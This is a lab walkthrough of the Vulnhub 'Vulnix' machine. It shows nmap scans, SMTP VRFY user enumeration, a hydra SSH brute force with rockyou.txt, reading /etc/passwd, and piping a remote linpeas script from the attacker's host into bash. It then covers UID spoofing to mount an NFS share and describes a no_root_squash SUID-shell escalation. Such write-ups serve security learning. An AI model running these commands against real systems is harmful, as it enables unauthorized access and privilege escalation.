Vulnhub Vulnix
22 March, 2021
Machine Link: https://www.vulnhub.com/entry/hacklab-vulnix,48/
Beginning with an nmap scan, that's a lot of ports... Looks like its a mail server
$ sudo nmap -A -p 1-20000 192.168.56.112
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.56.112
Host is up (0.00068s latency).
Not shown: 19988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL RESP-CODES STLS CAPA SASL TOP
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33279/udp mountd
| 100005 1,2,3 42338/tcp6 mountd
| 100005 1,2,3 42726/udp6 mountd
| 100005 1,2,3 46563/tcp mountd
| 100021 1,3,4 37137/udp nlockmgr
| 100021 1,3,4 37553/tcp6 nlockmgr
| 100021 1,3,4 40311/tcp nlockmgr
| 100021 1,3,4 53741/udp6 nlockmgr
| 100024 1 38901/udp6 status
| 100024 1 40388/udp status
| 100024 1 59400/tcp6 status
| 100024 1 60658/tcp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities LOGIN-REFERRALS more IDLE have post-login OK IMAP4rev1 ID SASL-IR listed LITERAL+ STARTTLS LOGINDISABLEDA0001 ENABLE Pre-login
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 08:00:27:71:3F:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5h29m58s, deviation: 0s, median: 5h29m58s
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.56.112
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.64 seconds
Let's begin with port 25, running smtpd.
$ nmap -p25 --script smtp-commands 192.168.56.112 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 10:35 EDT
Nmap scan report for 192.168.56.112
Host is up (0.018s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
Nmap done: 1 IP address (1 host up) scanned in 17.82 seconds
Using smtp-user-enum with this list to enumerate usernames
$ /usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /media/sf_Projects/HTB/wordlists/usernames.txt -t 192.168.56.112 1 ⨯
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /media/sf_Projects/HTB/wordlists/usernames.txt
Target count ............. 1
Username count ........... 86771
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Mar 23 10:48:44 2021 #########
exists.56.112: backup
exists.56.112: bin
exists.56.112: daemon
exists.56.112: landscape
192.168.56.112: list exists
exists.56.112: list
exists.56.112: lp
exists.56.112: mail
192.168.56.112: man exists
exists.56.112: man
exists.56.112: news
exists.56.112: nobody
exists.56.112: postfix
exists.56.112: postmaster
exists.56.112: proxy
192.168.56.112: root exists
exists.56.112: root
exists.56.112: sync
exists.56.112: user
######## Scan completed at Tue Mar 23 10:53:37 2021 #########
19 results.
86771 queries in 293 seconds (296.1 queries / sec)
I also checked manually for the user vulnix and yes looks like it exists
$ telnet 192.168.56.112 25
Trying 192.168.56.112...
Connected to 192.168.56.112.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
VRFY vulnix
252 2.0.0 vulnix
VRFY lkansd
550 5.1.1 <lkansd>: Recipient address rejected: User unknown in local recipient table
Moving on to the next port, finger running on port 79. It doesn't give much information apart from confirming that the users are present
$ finger root@192.168.56.112
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
$ finger vulnix@192.168.56.112
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Reading about the rest of open ports, I realised not a lot can be done without obtaining a set of credentials. So next I checked out the nfs share.
$ mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock
mount.nfs: failed to apply fstab options
$ sudo mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock 32 ⨯
[sudo] password for kali:
$ cd vulnix
cd: permission denied: vulnix
# cd vulnix
cd: permission denied: vulnix
# ls -ltrha
total 332K
drwxr-x--- 2 nobody 4294967294 4.0K Sep 2 2012 vulnix
Probably due to some misconfiguration on the server, the nfs share couldn't be mounted with the proper permissions. On reading more, I found that the UID of the client machine must be same as the one allowed to access the folder on the server. At this point I thought of going back to ssh and brute forcing the password for vulnix using rockyou.txt.
$ hydra -l vulnix -P /media/sf_Projects/HTB/wordlists/rockyou.txt 192.168.56.112 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-23 12:05:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 34.00 tries/min, 102 tries in 00:03h, 14344297 to do in 7031:32h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.53 tries/min, 428 tries in 00:15h, 14343971 to do in 8378:30h, 4 active
Well that was taking a lot of time so I tried the user user
$ hydra -l user -P /media/sf_Projects/HTB/wordlists/rockyou.txt 192.168.56.112 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-23 12:32:10
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 32.33 tries/min, 97 tries in 00:03h, 14344302 to do in 7393:59h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.27 tries/min, 424 tries in 00:15h, 14343975 to do in 8457:32h, 4 active
[22][ssh] host: 192.168.56.112 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-23 12:51:03
OK so now that I was in, I started to explore around.
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
Unfortunately I couldn't transfer linpeas because apparently there was no space left on disk
user@vulnix:~$ wget http://192.168.56.103:8000/linpeas.sh
--2021-03-23 22:24:20-- http://192.168.56.103:8000/linpeas.sh
Connecting to 192.168.56.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 320037 (313K) [text/x-sh]
Saving to: `linpeas.sh'
0% [ ] 0 --.-K/s in 0s
Cannot write to `linpeas.sh' (No space left on device).
But I ran it by directly piping the output of wget to bash
user@vulnix:~$ wget -O - http://192.168.56.103:8000/linpeas.sh | bash
Linpeas didn't show me anything useful though. So I backtracked a bit and thought about the NFS permission blockade. Now since I can get to know the UID of vulnix, I can create the same user on my local machine and hopefully mount the folder properly this time around.
──(kali㉿kali)-[~]
└─$ su vulnix
Password:
$ sudo mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock
[sudo] password for vulnix:
$ cd /home/kali/vulnix
$ ls -ltrha
total 20K
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
-rw-r--r-- 1 vulnix vulnix 3.5K Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
drwxr-x--- 2 vulnix vulnix 4.0K Sep 2 2012 .
drwxr-xr-x 20 kali kali 4.0K Mar 23 13:24 ..
So I created an SSH key but when I tried to add it to /home/vulnix/.ssh/authorized_keys I kept getting "no space left on device". Apparently this was a recurring issue with this box, and I couldn't find a way to get around it.
So to know further, I'd suggest reading abatchy's post. vulnix is allowed to sudoedit /etc/exports and disable root_squash for /home/vulnix. root_squash is defined as
root_squash prevents remote root users from having superuser (root) privileges on remote NFS-mounted volumes. no_root_squash allows root user on the NFS client host to access the NFS-mounted directory with the same rights and privileges that the superuser would normally have. Now from the attack machine, you can
cdasrootafter mounting. Now you transferbashor your favourite shell and run it as root after setting the SUID bit.